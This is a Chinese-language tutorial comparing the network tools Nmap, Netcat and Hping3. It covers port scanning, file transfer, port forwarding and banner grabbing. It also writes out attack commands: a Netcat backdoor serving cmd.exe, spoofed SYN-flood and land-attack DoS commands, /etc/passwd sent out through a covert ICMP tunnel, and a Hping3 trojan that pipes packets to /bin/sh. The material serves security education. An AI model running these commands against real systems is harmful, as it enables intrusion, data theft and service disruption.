欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

Nmap、Netcat、Hping3工具对比

程序员文章站 2022-03-16 16:57:04
在网络安全领域,Nmap、Netcat、Hping3都是安全工程师必备的工具。Nmap主要作为端口扫描器,侦查目标机的端口及服务状态;而Netcat则整合了网络中各种常用功能(如后门、文件传输...

网络安全领域,Nmap、Netcat、Hping3都是安全工程师必备的工具。Nmap主要作为端口扫描器,侦查目标机的端口及服务状态;而Netcat则整合了网络中各种常用功能(如后门、文件传输、端口扫描、端口转发等等),能辅助完成丰富的操作;Hping3主要作为特定的TCPIP数据包产生与解析的工具,当然也可用于Ping操作。
Nmap、Netcat、Hping3工具对比
 
1     Nmap
核心应用:搜集基本信息
  
1.1  Nmap简介
  Nmap是目前业界最为知名、最为强大的端口扫描器。它是由Fyodor创建的开源软件,在1997年首次发布。十多年来,Nmap开发团队一直不停地对其维护、更新,并规划开发新的功能。Nmap在安全领域内非常流行,像渗透工具Metasploit、漏洞扫描工具openVAS等工具都内置了Nmap,而漏洞扫描工具Nessus也支持导入Nmap扫描结果。
  Nmap是主要用于基本的信息的搜集,包括主机活动状态、主机端口开放状况、应用服务及版本、操作系统与设备类型等等。另外Nmap完全支持IPv6;而Nmap脚本引擎(NSE)结合内置的丰富的Lua脚本让其支持的功能更加全面、更加精细(如提供丰富的HTTP相关的扫描脚本)。

1.2  Nmap功能

  Nmap功能用法非常简单,这里简要回顾一下:
1.2.1  主机发现
nmap -sn -T4 targetip
1.2.2  端口扫描
nmap -T4 -s[scan method] -p[portrange] targetip
1.2.3  服务与版本侦测
nmap -T4 -sV targetip
1.2.4  操作系统扫描
nmap -T4 -O targetip
 
1.3  简单示例
(扫描目标机的端口与OS类型):
Nmap、Netcat、Hping3工具对比
 
详细使用方法参考: http://www.2cto.com/Article/201210/158960.html 
2     Netcat
核心应用:完成网络中各种辅助操作,被称作TCPIP的瑞士军刀

2.1  Netcat简介
  Netcat用于从TCP/UDP连接中读取或发送网络数据。cat是Linux中查看或连接文件的命令,所以netcat本意为从网络上查看文件内容。而Netcat的作者Hobbit为它添加了非常丰富的功能,使它几乎能够完成网络操作中各式各样的操作,所以Netcat在网络安全领域被称作“TCPIP的瑞士军刀”("Swiss-army knife forTCP/IP")。


Nmap、Netcat、Hping3工具对比
  Netcat稳定版1.10由Hobbit在1996年3月发布(开源软件),之后作者没有再对其进行维护,但该工具十多年来依然在被广泛地使用,而且基于Netcat的各种衍生工具也层出不穷,他们在很多方面增强或扩展了Netcat的功能。
  Nmap团队开发了Ncat作为Netcat的升级版本,增加了更多的功能,让其更能适应现代网络环境的需求。
2.2  Netcat功能
2.2.1  网络连接
  类似于Telnet的功能,使用Netcat能够简便地登录到目标机上开放的端口。
  例如,
nc mail.server.net 25
  向mail.server.net的25号TCP端口发起连接。
 
2.2.2  端口扫描
  Netcat同样可以进行端口扫描,但与Nmap相比,它的性能及使用范围都很有限。如果只想简单地探测几个端口的开放状态,使用Netcat也可行。
  端口扫描格式如下:
nc –v –z hostnameport[s]
  实例:
nc –v –z www.yahoo.com 80 22
  扫描yahoo网站的80、22端口,判断其是否开放。
 
2.2.3  文件传输
  Netcat最初的用途就是文件传输,它可以像Cat命令一样将读取的文件重定向到网络上的另外的文件。Netcat在网络应用中既可以当做服务器端,开启本机一个监听端口,也可以作为客户端向其他服务器端口发起连接。所以,文件传输,即是在两端分别运行Netcat。
  在接受端,运行Netcat开启端口监听服务。
nc –L –p 4444 >receivedfile.zip
  此处-L启动监听模式(即作为服务器端),开启4444端口,将接受到的数据写入到文件somefile.zip中。
  而在发送端,只需连接该服务器端开放的端口,并选择需要发送的文件。
nc 192.168.1.43 4444< testfile.zip
  使用<符号输入testfile.zip文件,并向目标机的4444端口发起连接。在建立连接成功后,发送端会将文件传送到接收端,接受端将收到的数据写入receivedfile.zip文件。整个过程,比较类似于cat命令,因为具体的网络传输过程由Netcat负责。
 
2.2.4  开启后门
  Netcat甚至也可以用作后门程序。如果用户已经侵入到一台计算机,那么让该计算机在开机后(或其他条件下)自动启动Netcat,打开指定的端口,等待用户连接,在连接成功后执行特定程序(如cmd.exe,以便远程执行命令)。
nc –L –p 4444 –e cmd.exe
  以监听模式启动Netcat,开启TCP端口4444,在与客户端成功建立连接后,执行cmd.exe程序(-e cmd.exe,此处为用户打开命令行执行窗口,用户可以通过命令操作此计算机)。
  在客户端,直接连接目标机的4444端口即可。
nc 192.168.1.43 4444
  连接后,客户端可以接收到一个命令行窗口。
 
2.2.5  端口转发
  端口转发(PortForwarding)也是Netcat比较实用的用法。先将Netcat作为服务器接收其他主机的连接,然后将连接的数据转发另外的目标机端口。
  比如:
mkfifo backpipe
nc -l 12345  0<backpipe | nc www.google.com 801>backpipe
  比如,此处开启端口12345,作为www.google.com的代理。其他无法直接登陆google的用户可以通过此代理端口来与google进行交互。这里创建了一个fifo,是为实现双向数据通讯,因为管道运算符本身是单向的。
 
2.2.6  标语提取
  标语提取(BannerGrabbing)的含义是抓取应用程序在建立连接后打印的标语提示信息,例如建立FTP连接后,FTP服务器可能打印出提示信息:FTP xxx.xxx等数据。
  所以,根据服务器打印的信息,有时可以推断出对方服务程序的详细版本。这也是Nmap进行服务与版本侦测采用方法。
  例如,首先创建一份文件,包含以下文本:
[plain] view plaincopy
HEAD / HTTP/1.0 
<return> 
<return> 
  然后,将此文件发送到目标服务器的80端口,诱发对方发送HTTP首部数据。
cat file>nc -vv -w 2 www.cnn.com 80 >output.txt
  然后可从output.txt查看到对方的发送的HEAD的标语信息。
 
 
2.2.7  其他功能
  Netcat其他常用的功能:
支持完全的DNS转发、逆向检查
支持用户指定源端口
支持用户指定源端IP地址
内置宽松源路由能力(loosesource-routing capability)
慢速发送模式,可指定每隔多少秒发送一行文本
将发送或接收数据以16进制格式导出
 
3     Hping3
核心应用:灵活地构建TCPIP数据包
 Nmap、Netcat、Hping3工具对比
3.1  Hping3介绍
  Hping是用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore Sanfilippo。目前最新版是Hping3,支持使用tcl脚本自动化地调用其API。Hping是安全审计、防火墙测试等工作的标配工具。
  Hping优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测。
  而Nmap团队也开发了一款类似的工具Nping,集成在Nmap的安装包中。
3.2  Hping3功能
  Hping3主要有以下典型功能应用:
3.2.1  防火墙测试
  使用Hping3指定各种数据包字段,依次对防火墙进行详细测试。请参考:http://0daysecurity.com/articles/hping3_examples.html
  测试防火墙对ICMP包的反应、是否支持Traceroute、是否开放某个端口、对防火墙进行拒绝服务攻击(DoS attack)。
  例如,以LandAttack方式测试目标防火墙(Land Attack是将发送源地址设置为与目标地址相同,诱使目标机与自己不停地建立连接)。
hping3 -S  -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
 
3.2.2  端口扫描

  Hping3也可以对目标端口进行扫描。Hping3支持指定TCP各个标志位、长度等信息。
  以下示例可用于探测目标机的80端口是否开放:
hping3 -I eth0  -S 192.168.10.1 -p 80
  其中-Ieth0指定使用eth0端口,-S指定TCP包的标志位SYN,-p 80指定探测的目的端口。
  hping3支持非常丰富的端口探测方式,Nmap拥有的扫描方式hping3几乎都支持(除开connect方式,因为Hping3仅发送与接收包,不会维护连接,所以不支持connect方式探测)。而且Hping3能够对发送的探测进行更加精细的控制,方便用户微调探测结果。
  当然,Hping3的端口扫描性能及综合处理能力,无法与Nmap相比。一般使用它仅对少量主机的少量端口进行扫描。
 
3.2.3  Idle扫描
  Idle扫描(Idle Scanning)是一种匿名扫描远程主机的方式,该方式也是有Hping3的作者Salvatore Sanfilippo发明的,目前Idle扫描在Nmap中也有实现。
  该扫描原理是:寻找一台idle主机(该主机没有任何的网络流量,并且IPID是逐个增长的),攻击端主机先向idle主机发送探测包,从回复包中获取其IPID。冒充idle主机的IP地址向远程主机的端口发送SYN包(此处假设为SYN包),此时如果远程主机的目的端口开放,那么会回复SYN/ACK,此时idle主机收到SYN/ACK后回复RST包。然后攻击端主机再向idle主机发送探测包,获取其IPID。那么对比两次的IPID值,我们就可以判断远程主机是否回复了数据包,从而间接地推测其端口状态。
Nmap、Netcat、Hping3工具对比
 
3.2.4  拒绝服务攻击
  使用Hping3可以很方便构建拒绝服务攻击。
  比如对目标机发起大量SYN连接,伪造源地址为192.168.10.99,并使用1000微秒的间隔发送各个SYN包。
hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
  其他攻击如smurf、teardrop、land attack等也很容易构建出来。
 
3.2.5  文件传输

  Hping3支持通过TCP/UDP/ICMP等包来进行文件传输。相当于借助TCP/UDP/ICMP包建立隐秘隧道通讯。
  实现方式是开启监听端口,对检测到的签名(签名为用户指定的字符串)的内容进行相应的解析。
  在接收端开启服务:
hping3 192.168.1.159--listen signature --safe  --icmp
  监听ICMP包中的签名,根据签名解析出文件内容。
  在发送端使用签名打包的ICMP包发送文件:
hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd
  将/etc/passwd密码文件通过ICMP包传给192.168.10.44主机。发送包大小为100字节(-d 100),发送签名为signature(-sign signature)。
 
3.2.6  木马功能

  如果Hping3能够在远程主机上启动,那么可以作为木马程序启动监听端口,并在建立连接后打开shell通信。与Netcat的后门功能类似。
  示例:本地打开53号UDP端口(DNS解析服务)监听来自192.168.10.66主机的包含签名为signature的数据包,并将收到的数据调用/bin/sh执行。
  在木马启动端:
hping3 192.168.10.66--listen signature --safe --udp -p 53 |/bin/sh
  在远程控制端:
echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
  将包含ls命令的文件加上签名signature发送到192.168.10.44主机的53号UDP端口,包数据长度为100字节。
  当然这里只是简单的演示程序,真实的场景,控制端可以利益shell执行很多的高级复杂的操作